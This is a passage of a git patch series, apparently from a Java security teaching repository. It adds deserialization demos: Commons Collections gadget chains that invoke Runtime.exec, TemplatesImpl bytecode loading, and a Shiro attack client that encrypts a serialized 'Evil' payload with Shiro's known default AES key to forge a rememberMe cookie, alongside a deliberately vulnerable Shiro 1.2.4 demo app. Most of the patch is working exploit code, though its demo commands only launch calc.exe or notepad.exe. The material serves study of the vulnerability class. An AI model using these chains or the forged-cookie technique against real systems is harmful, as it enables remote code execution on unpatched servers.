ChainedTransformer(transformers); + + Map innerMap = new HashMap(); + Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); + outerMap.put("test", "xxxx"); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java new file mode 100644 index 0000000..ec9aa5e --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java @@ -0,0 +1,71 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InstantiateTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.LazyMap; +import org.apache.commons.collections.map.TransformedMap; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.Base64; +import java.util.HashMap; +import java.util.Map; + +public class TemplatesImplDeserialization { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + // source: bytecodes/HelloTemplateImpl.java + byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(obj), + new InvokerTransformer("newTransformer", null, null) + }; + + Transformer transformerChain = new ChainedTransformer(transformers); + + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); + + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); + construct.setAccessible(true); + InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); + + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(handler); + oos.close(); + + // 本地测试触发 + // System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object) ois.readObject(); + } +} From c76eb9fc4ecea2e3ecebb752578fbf7a4be26770 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 04:48:01 +0800 Subject: [PATCH 06/35] improve manual --- README.md | 20 ++++++++++++++----- ...ntro.java => CommonsCollectionsIntro.java} | 2 +- 2 files changed, 16 insertions(+), 6 deletions(-) rename general/src/main/java/com/govuln/deserialization/{CommonCollectionsIntro.java => CommonsCollectionsIntro.java} (96%) diff --git a/README.md b/README.md index 9b3d0b3..0b6b5f3 100644 --- a/README.md +++ b/README.md @@ -18,11 +18,21 @@ - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) +- Java安全漫谈 - 14.认识CommonsCollections3 ## Demo代码 -- 我简化的[CommonCollections6](deserialization/src/main/java/com/govuln/CommonsCollections6.java),更方便大家理解 -- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/HelloClassLoader.java) -- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/HelloDefineClass.java) -- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/HelloTemplatesImpl.java) -- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/HelloBCEL.java) +字节码: + +- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/bytes/HelloClassLoader.java) +- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/bytes/HelloDefineClass.java) +- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/bytes/HelloBCEL.java) + +反序列化: + +- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro.java) +- 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro3.java) +- 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) diff --git a/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java similarity index 96% rename from general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java rename to general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java index 51a0db5..61c4ba4 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java @@ -9,7 +9,7 @@ import java.util.HashMap; import java.util.Map; -public class CommonCollectionsIntro { +public class CommonsCollectionsIntro { public static void main(String[] args) throws Exception { Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.getRuntime()), From 7efdcdf0549da724a108c6b8b2bd1657f778953e Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 04:49:31 +0800 Subject: [PATCH 07/35] edit path --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 0b6b5f3..8c1b4e2 100644 --- a/README.md +++ b/README.md @@ -31,8 +31,8 @@ 反序列化: -- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro.java) +- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) - 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 -- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro2.java) -- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro3.java) +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) From 88f2d9d85d5ffd00586268b60795eea04888efae Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 23:26:38 +0800 Subject: [PATCH 08/35] =?UTF-8?q?CommonsCollections6=E5=A4=9A=E5=91=BD?= =?UTF-8?q?=E4=BB=A4?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CommonsCollections6Multiple.java | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java new file mode 100644 index 0000000..17e8e1d --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java @@ -0,0 +1,66 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.io.*; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections6Multiple { + public static void main(String[] args) throws Exception { + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "notepad.exe" }), + new ConstantTransformer(1), + }; + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap + Map innerMap = new HashMap(); + Map outerMap = LazyMap.decorate(innerMap, transformerChain); + + TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + + outerMap.remove("keykey"); + + Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); + f.setAccessible(true); + f.set(transformerChain, transformers); + + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + // 本地测试触发 + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} From 146b385eb9dc9c04e565e0037bb497c1e82393b2 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 23:36:15 +0800 Subject: [PATCH 09/35] update manual --- README.md | 1 + .../com/govuln/deserialization/CommonsCollections6Multiple.java | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 8c1b4e2..322b787 100644 --- a/README.md +++ b/README.md @@ -36,3 +36,4 @@ - 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) - 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) +- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java index 17e8e1d..aaf2282 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java @@ -59,7 +59,7 @@ public static void main(String[] args) throws Exception { oos.close(); // 本地测试触发 - System.out.println(barr); + System.out.println(barr); ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); Object o = (Object)ois.readObject(); } From 190f2b82ddb73f3582d9a26013cdc30896dfa437 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 23:37:30 +0800 Subject: [PATCH 10/35] 14 section --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 322b787..96434cf 100644 --- a/README.md +++ b/README.md @@ -18,7 +18,7 @@ - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) -- Java安全漫谈 - 14.认识CommonsCollections3 +- [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) ## Demo代码 From 4366874f217ec8b65e872e3d934347fc80e35f50 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 9 Mar 2021 02:11:30 +0800 Subject: [PATCH 11/35] add shiro deserialization --- shiro/.gitignore | 31 +++++++ shiro/pom.xml | 75 +++++++++++++++++ .../java/org/vulhub/shiroattack/Client.java | 20 +++++ .../shiroattack/CommonsCollectionsShiro.java | 60 +++++++++++++ .../java/org/vulhub/shiroattack/Evil.java | 19 +++++ .../java/org/vulhub/shirodemo/MainRealm.java | 25 ++++++ .../org/vulhub/shirodemo/ShiroConfig.java | 46 ++++++++++ .../shirodemo/ShirodemoApplication.java | 13 +++ .../org/vulhub/shirodemo/UserController.java | 38 +++++++++ .../src/main/resources/application.properties | 1 + shiro/src/main/resources/templates/error.html | 12 +++ shiro/src/main/resources/templates/hello.html | 13 +++ shiro/src/main/resources/templates/login.html | 84 +++++++++++++++++++ 13 files changed, 437 insertions(+) create mode 100644 shiro/.gitignore create mode 100644 shiro/pom.xml create mode 100644 shiro/src/main/java/org/vulhub/shiroattack/Client.java create mode 100644 shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java create mode 100644 shiro/src/main/java/org/vulhub/shiroattack/Evil.java create mode 100644 shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java create mode 100644 shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java create mode 100644 shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java create mode 100644 shiro/src/main/java/org/vulhub/shirodemo/UserController.java create mode 100644 shiro/src/main/resources/application.properties create mode 100644 shiro/src/main/resources/templates/error.html create mode 100644 shiro/src/main/resources/templates/hello.html create mode 100644 shiro/src/main/resources/templates/login.html diff --git a/shiro/.gitignore b/shiro/.gitignore new file mode 100644 index 0000000..a2a3040 --- /dev/null +++ b/shiro/.gitignore @@ -0,0 +1,31 @@ +HELP.md +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/** +!**/src/test/** + +### STS ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### IntelliJ IDEA ### +.idea +*.iws +*.iml +*.ipr + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ + +### VS Code ### +.vscode/ diff --git a/shiro/pom.xml b/shiro/pom.xml new file mode 100644 index 0000000..85dad86 --- /dev/null +++ b/shiro/pom.xml @@ -0,0 +1,75 @@ + + + 4.0.0 + + org.springframework.boot + spring-boot-starter-parent + 2.2.2.RELEASE + + + org.vulhub + shirodemo + 1.0-SNAPSHOT + shirodemo + Demo project for Spring Boot and Shiro + + + 1.8 + + + + + org.springframework.boot + spring-boot-starter-thymeleaf + 2.2.2.RELEASE + + + org.springframework.boot + spring-boot-starter-web + 2.2.2.RELEASE + + + + org.projectlombok + lombok + 1.18.10 + true + + + + org.apache.shiro + shiro-core + 1.2.4 + + + + org.apache.shiro + shiro-spring + 1.2.4 + + + + commons-collections + commons-collections + 3.2.1 + + + + org.javassist + javassist + 3.27.0-GA + + + + + + + + org.springframework.boot + spring-boot-maven-plugin + + + + + diff --git a/shiro/src/main/java/org/vulhub/shiroattack/Client.java b/shiro/src/main/java/org/vulhub/shiroattack/Client.java new file mode 100644 index 0000000..3b7abd2 --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shiroattack/Client.java @@ -0,0 +1,20 @@ +package org.vulhub.shiroattack; + +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.shiro.crypto.AesCipherService; +import org.apache.shiro.util.ByteSource; + +public class Client { + public static void main(String []args) throws Exception { + ClassPool pool = ClassPool.getDefault(); + CtClass clazz = pool.get(Evil.class.getName()); + byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); + + AesCipherService aes = new AesCipherService(); + byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); + + ByteSource ciphertext = aes.encrypt(payloads, key); + System.out.printf(ciphertext.toString()); + } +} diff --git a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java b/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java new file mode 100644 index 0000000..ae0569f --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java @@ -0,0 +1,60 @@ +package org.vulhub.shiroattack; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.io.*; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollectionsShiro { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public byte[] getPayload(byte[] clazzBytes) throws Exception { + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer transformer = new InvokerTransformer("getClass", null, null); + + Map innerMap = new HashMap(); + Map outerMap = LazyMap.decorate(innerMap, transformer); + + TiedMapEntry tme = new TiedMapEntry(outerMap, obj); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + + outerMap.clear(); + setFieldValue(transformer, "iMethodName", "newTransformer"); + + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + return barr.toByteArray(); + } + + public static void main(String []args) throws Exception { + ClassPool pool = ClassPool.getDefault(); + CtClass clazz = pool.get(Evil.class.getName()); + + System.out.println("Class " + Evil.class.getName() + "'s bytecode is generate."); + new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); + } +} \ No newline at end of file diff --git a/shiro/src/main/java/org/vulhub/shiroattack/Evil.java b/shiro/src/main/java/org/vulhub/shiroattack/Evil.java new file mode 100644 index 0000000..ae12bba --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shiroattack/Evil.java @@ -0,0 +1,19 @@ +package org.vulhub.shiroattack; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; + +public class Evil extends AbstractTranslet { + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} + + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} + + public Evil() throws Exception { + super(); + System.out.println("Hello TemplatesImpl"); + Runtime.getRuntime().exec("calc.exe"); + } +} \ No newline at end of file diff --git a/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java b/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java new file mode 100644 index 0000000..7e8b67e --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java @@ -0,0 +1,25 @@ +package org.vulhub.shirodemo; + +import org.apache.shiro.authc.*; +import org.apache.shiro.authz.AuthorizationInfo; +import org.apache.shiro.realm.AuthorizingRealm; +import org.apache.shiro.subject.PrincipalCollection; + +public class MainRealm extends AuthorizingRealm { + + @Override + protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { + return null; + } + + @Override + protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { + String username = (String) authenticationToken.getPrincipal(); + String password = new String((char [])authenticationToken.getCredentials()); + if (username.equals("admin") && password.equals("vulhub")) { + return new SimpleAuthenticationInfo(username, password, getName()); + } else { + throw new IncorrectCredentialsException("Username or password is incorrect."); + } + } +} diff --git a/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java b/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java new file mode 100644 index 0000000..9dfdc1b --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java @@ -0,0 +1,46 @@ +package org.vulhub.shirodemo; + +import org.apache.shiro.mgt.RememberMeManager; +import org.apache.shiro.mgt.SecurityManager; +import org.apache.shiro.spring.web.ShiroFilterFactoryBean; +import org.apache.shiro.web.mgt.CookieRememberMeManager; +import org.apache.shiro.web.mgt.DefaultWebSecurityManager; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; + +import java.util.LinkedHashMap; +import java.util.Map; + +@Configuration +public class ShiroConfig { + @Bean + MainRealm mainRealm() { + return new MainRealm(); + } + + @Bean + RememberMeManager cookieRememberMeManager() { + return new CookieRememberMeManager(); + } + + @Bean + SecurityManager securityManager(MainRealm mainRealm, RememberMeManager cookieRememberMeManager) { + DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); + manager.setRealm(mainRealm); + manager.setRememberMeManager(cookieRememberMeManager); + return manager; + } + + @Bean(name="shiroFilter") + ShiroFilterFactoryBean shiroFilterFactoryBean(SecurityManager securityManager) { + ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); + bean.setSecurityManager(securityManager); + bean.setLoginUrl("/login"); + bean.setUnauthorizedUrl("/unauth"); + Map map = new LinkedHashMap<>(); + map.put("/doLogin", "anon"); + map.put("/**", "user"); + bean.setFilterChainDefinitionMap(map); + return bean; + } +} diff --git a/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java b/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java new file mode 100644 index 0000000..46303d0 --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java @@ -0,0 +1,13 @@ +package org.vulhub.shirodemo; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class ShirodemoApplication { + + public static void main(String[] args) { + SpringApplication.run(ShirodemoApplication.class, args); + } + +} diff --git a/shiro/src/main/java/org/vulhub/shirodemo/UserController.java b/shiro/src/main/java/org/vulhub/shirodemo/UserController.java new file mode 100644 index 0000000..4317c69 --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shirodemo/UserController.java @@ -0,0 +1,38 @@ +package org.vulhub.shirodemo; + +import org.apache.shiro.SecurityUtils; +import org.apache.shiro.authc.AuthenticationException; +import org.apache.shiro.authc.UsernamePasswordToken; +import org.apache.shiro.subject.Subject; +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.*; + +@Controller +public class UserController { + @PostMapping("/doLogin") + public String doLoginPage(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam(name="rememberme", defaultValue = "") String rememberMe) { + Subject subject = SecurityUtils.getSubject(); + try { + subject.login(new UsernamePasswordToken(username, password, rememberMe.equals("remember-me"))); + } catch (AuthenticationException e) { + return "forward:/login"; + } + + return "forward:/"; + } + + @RequestMapping("/") + public String helloPage() { + return "hello"; + } + + @RequestMapping("/unauth") + public String errorPage() { + return "error"; + } + + @RequestMapping("/login") + public String loginPage() { + return "login"; + } +} diff --git a/shiro/src/main/resources/application.properties b/shiro/src/main/resources/application.properties new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/shiro/src/main/resources/application.properties @@ -0,0 +1 @@ + diff --git a/shiro/src/main/resources/templates/error.html b/shiro/src/main/resources/templates/error.html new file mode 100644 index 0000000..2e5f137 --- /dev/null +++ b/shiro/src/main/resources/templates/error.html @@ -0,0 +1,12 @@ + + + + + Error + + + +

login error

+ + + \ No newline at end of file diff --git a/shiro/src/main/resources/templates/hello.html b/shiro/src/main/resources/templates/hello.html new file mode 100644 index 0000000..26d0701 --- /dev/null +++ b/shiro/src/main/resources/templates/hello.html @@ -0,0 +1,13 @@ + + + + + Congrats + + + +

Congrats

+

You have successfully logged in

+ + + \ No newline at end of file diff --git a/shiro/src/main/resources/templates/login.html b/shiro/src/main/resources/templates/login.html new file mode 100644 index 0000000..b8e743b --- /dev/null +++ b/shiro/src/main/resources/templates/login.html @@ -0,0 +1,84 @@ + + + + + Login Page + + + + + + + From 733ecaf6115f3ba7d3ceae9891a0e5a5e990904a Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 9 Mar 2021 02:12:55 +0800 Subject: [PATCH 12/35] remove unused main method --- .../org/vulhub/shiroattack/CommonsCollectionsShiro.java | 8 -------- 1 file changed, 8 deletions(-) diff --git a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java b/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java index ae0569f..2f69fef 100644 --- a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java +++ b/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java @@ -49,12 +49,4 @@ public byte[] getPayload(byte[] clazzBytes) throws Exception { return barr.toByteArray(); } - - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(Evil.class.getName()); - - System.out.println("Class " + Evil.class.getName() + "'s bytecode is generate."); - new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); - } } \ No newline at end of file From 95532469fcd99b94f66f2f1548837d2ded4a0dbc Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 04:11:43 +0800 Subject: [PATCH 13/35] update --- shiro/.gitignore | 31 ----- shiro/pom.xml | 75 ------------ .../java/org/vulhub/shirodemo/MainRealm.java | 25 ---- .../org/vulhub/shirodemo/ShiroConfig.java | 46 -------- .../shirodemo/ShirodemoApplication.java | 13 --- .../org/vulhub/shirodemo/UserController.java | 38 ------ .../src/main/resources/application.properties | 1 - shiro/src/main/resources/templates/error.html | 12 -- shiroattack/pom.xml | 96 ++++++++++++++++ shiroattack/shiroattack.iml | 2 + .../java/com/govuln}/shiroattack/Client.java | 4 +- .../shiroattack/CommonsCollections6.java | 55 +++++++++ .../shiroattack/CommonsCollectionsShiro.java | 7 +- .../java/com/govuln}/shiroattack/Evil.java | 2 +- .../java/com/govuln/shiroattack/Wrong.java | 17 +++ shirodemo/pom.xml | 108 ++++++++++++++++++ shirodemo/shirodemo.iml | 2 + 